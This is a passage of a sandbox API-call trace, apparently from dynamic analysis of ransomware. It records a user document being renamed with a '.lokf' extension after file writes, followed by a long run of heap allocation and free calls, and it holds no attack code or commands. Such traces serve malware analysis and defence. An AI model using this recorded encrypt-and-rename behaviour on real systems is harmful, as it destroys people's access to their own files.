1 [0059.559] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.560] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.560] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.560] CloseHandle (hObject=0x5cc) returned 1 [0059.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0059.561] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\VzHk HXQOnf5.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\vzhk hxqonf5.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\VzHk HXQOnf5.odp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\vzhk hxqonf5.odp.lokf")) returned 1 [0059.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.561] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0059.562] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d2dde0, ftCreationTime.dwHighDateTime=0x1d4ce9a, ftLastAccessTime.dwLowDateTime=0xebf36fc0, ftLastAccessTime.dwHighDateTime=0x1d4c89c, ftLastWriteTime.dwLowDateTime=0xebf36fc0, ftLastWriteTime.dwHighDateTime=0x1d4c89c, nFileSizeHigh=0x0, nFileSizeLow=0x1727b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VzHk HXQOnf5.odp", cAlternateFileName="VZHKHX~1.ODP")) returned 0 [0059.562] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0059.563] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269928 [0059.563] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.564] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] 